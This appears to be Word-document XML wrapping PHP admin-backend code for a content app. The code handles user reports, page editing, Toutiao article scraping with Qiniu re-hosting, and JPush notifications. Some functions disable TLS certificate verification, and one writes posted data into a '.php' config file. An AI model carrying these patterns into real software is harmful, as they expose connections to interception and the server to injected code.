    <w:p w14:paraId="0CD9FF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22C9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3502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50A5E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_ping')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E02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6C6F4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49A95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E9D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48928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8553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7D4A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3FDA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0CE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A529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EA22D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B1E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9AE0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BDDF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XaiDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33422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CD495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527EA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F9B2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_ping_xia')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F695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6E7F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6D1EB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186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762A5F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2AA9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A6F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4A86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B3A8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F5E0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4E55F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8B7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86E4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592F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D896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jubao')-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68D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5C417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57C4D8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35C288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2FCC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AF6D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Huifu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF4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F739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6FC6C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input('content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37128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D3432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jubao')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FB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193D9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Id=Session::get('admin','ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C72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db['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E636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db['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628E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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6BB6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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142B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dmin_id']=$adminId['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37234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jubao')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7844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6F4E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回复成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4767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A62D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回复失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C582D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D5E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279E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FEB0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12D583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193F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7AD0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4B4C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21D2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7984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C7A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Del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BC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A0CFC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F439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1E895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jubao')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162118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EBF5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E0E8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7E00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72EAB2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0CD96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5A086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10B42C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221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60B1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1B2B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241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150F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C52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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77843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page')-&gt;order('id asc,des desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265836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13FB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5706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7CB6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Add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E8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43955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6951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60AB23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207A4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itle']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F470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page')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8B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353FF3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文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71624F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94EA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A12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age')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C26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5C5D8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720137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3BF6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03CE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B58FD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30044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age')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F26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A9D6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736452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AB3B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0C3ACE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187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EBC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169D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2969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page')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77263A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090E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2221C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EF5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ADC36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186F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6D6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58C549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B249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9B55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1A5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rivate function get($url,$json=false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A426F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ContextOptions=array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB2E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sl"=&gt;array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E29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gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13134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_name"=&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65443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E41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9B981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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB376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json){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC6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21AB2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FC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0F01BA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64D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type=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48416E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BE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5BF45D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B46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4BB12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jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B8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79EB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1D5EC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59066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53F1B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1175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36E011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4D117D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33197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url.rand(11111,999999)) .$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F79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7D12CA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54F4BC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4BFD2D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ACEB1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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768A9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015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9C9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aiji(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732556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input('_url');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D478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请输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19D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DDC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D25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pathinfo($url)['basename'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02D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pathinfo($url)['basename'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA20C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B54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1EC9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请输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF36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F311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d+/",$url,$arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC82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arr['0'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69A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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则获取错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBA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CE1F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 = $arr['0']['0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B20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input('mychannel/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7CE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channel){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D36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频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mychannel</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B3D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EBCC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get('toutiao/view/id/'.$id,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519C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user'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A8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 = $data['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180B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id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423792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68F30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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D711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A9E6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CCE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mychannel'] == $mychannel){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9D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image']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1C5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this-&gt;qiniu($data['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342FC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F445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mychannel'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2456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this-&gt;get('toutiao/body_info/id/'.$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13155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   =   $this-&gt;_html_content($text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C81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ychannel'] == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE12A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images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C17EC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  = $this-&gt;qiniu($v['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2FD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text'] = strip_tags($v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A88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text'] = preg_replace("/\\r\\n/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759A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text'] = preg_replace("/\\r/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655010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text'] = preg_replace("/\s*/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98F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text'] = preg_replace("/\\n/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD57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text'] = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D3E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image'] &amp;&amp; $k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529E3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img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130EC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58C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0AF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 = $img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDC3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ychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BC9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 = $this-&gt;qiniu($data['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F2C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39C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data]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6FE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2633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 = Db::name('mychannel')-&gt;where('id',$mychannel)-&gt;cache(true)-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F3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当前频道是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;'._mychannelName($mychannel).'&lt;/b&gt;,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采集网址频道是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;'._mychannelName($data['mychannel']).'&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，请输入</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;'._mychannelName($mychannel).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采集网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108C2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1609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804C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html_content($article){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25117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src=\"(.*?)\"/", $article,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B8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063C0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  =&gt;  $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769F2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mg_1=$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46910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2=_imgUrl().$this-&gt;qiniu($img_1,'article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F58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_1 &amp;&amp; $img_2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77018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tr_replace($img_1,$img_2,$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11658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568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DB1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436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img_width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E118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img_height.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029780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onerror.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093086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inline.*?)\"(.*?)\"/si","",$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6F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p.*?)&gt;/si","&lt;p&gt;",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AFA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figure.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F07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a.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E932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data.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737C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width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618FD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alt.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F9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style.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272F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ticle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4C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69F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DF614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4768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325D6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43E8D3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5FDAC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7FCD7B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JPush\Client as JPush;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091971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picloud extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021F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30AD8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72320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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA94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apicloud']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50808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E76AD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9E0D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20C4B6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35A6F8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618F6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55AF8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49DF74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1C8BBE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3808E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t;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479BA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apicloud.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3E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00272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92FF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40615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67E2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97BA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584B9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2FE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37C9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this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DF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8CB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17B0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B54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html($url,$method='GET',$body=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF22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37191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w = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F00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header = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B4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Id: ".$config['appid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A1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Key: ".sha1($config['appid']."UZ".$config['appkey']."UZ".$now).".".$now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98F2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998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curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73186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RL, $url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C65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CUSTOMREQUEST, $method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D2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array("X-HTTP-Method-Override: $method"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8AB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httpheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70074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PEER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C5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HOST, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF3F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SERAGENT, $_SERVER['HTTP_USER_AGENT']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152D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AUTOREFERER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296F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POSTFIELDS, $body); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154AE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TIMEOUT, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C6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EADER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF817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RETURNTRANSFER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9A6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line = curl_exec($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CF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url_errno($curl)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25570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no'.curl_error($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1713B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A6C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url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D24D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otalline; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56E2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372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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE2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38F9C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title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61288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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B4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itle']  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E9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27B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ush')-&gt;where($map)-&gt;order('time desc,id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314573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gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B95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3025C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id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35631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gt;field('id,title,description,content,video,mychannel')-&gt;find($v['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C9B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this-&gt;_content($article['description']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597F9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tent){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A6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this-&gt;_content($article['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5EC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3BF5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title'] = $article['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33E8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content'] = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B770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C06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1654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54FC9F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b-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A882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54132F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list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EE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CF0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012D0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8B17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A914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post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03646B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post['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C50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       =   $post['type'];  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF0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latform']   =   $post['platform'];  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1E8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post['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA93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push_id']   =   $post['jpush_id']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5065F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jpush_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A01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push_id = Db::name('member_jpush')-&gt;where(['uid'=&gt;$data['jpush_id']])-&gt;value('jpush_id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C1D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jpush_id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE56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未绑定推送设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66A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D83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push_id']   =   $jpush_id; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE267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A0E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his-&gt;jpush($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811D4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url['http_code']) &amp;&amp; $url['http_code'] == 200){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16D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0B0329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ush')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BA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推送成功，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟内生效</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CC0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E78BE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推送失败！错误提示：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$url['msg']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79303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A09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E5B37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his-&gt;html('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C716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json_decode($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA3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status'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A470E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23050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ush')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348E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推送成功，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟内生效</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D97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19E7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推送失败！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msg:'.$url['msg']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD608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1BC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FBE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5E1C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277A1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27528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jpush($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A727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4E9BB1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ient = new JPush($config['app_key'], $config['master_secret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE1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empty($data['aid']) ? $data['aid'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3F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aid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D238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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Db::name('article')-&gt;field('id,title,description,content,video,mychannel')-&gt;find($data['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691A0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C5B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title|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require', 'content|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require','type' =&gt; 'number|require']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2C2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title' =&gt; $data['title'], 'content' =&gt; $data['content'], 'type'=&gt;$data['type']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DDA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4DC96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msg' =&gt; $validate-&gt;getError(),'http_code'=&gt;201];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8C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F85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956D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platform'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D6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Platform = ['ios'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA7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platform'] == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C8D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Platform = ['android'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1D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11C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Platform = ['ios','android'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BEC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88E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21920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 = $client-&gt;push();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798979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setPlatform($setPlatform);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11A7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jpush_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B1C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ddRegistrationId($data['jpush_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690F5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2260B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ddAllAudience(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EE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F3D7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aid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E3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this-&gt;_content($article['description']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBA3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tent){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B59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this-&gt;_content($article['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2D3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326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ndroidNotification($content, array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886C7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article['title'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA17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s' =&gt; [</w:t>
      </w:r>
    </w:p>
